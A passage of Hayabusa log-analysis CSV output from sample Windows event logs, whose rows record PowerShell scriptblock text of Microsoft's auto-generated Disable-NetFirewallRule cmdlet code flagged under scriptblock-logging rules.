[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) 
$__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias 
'*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 
(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
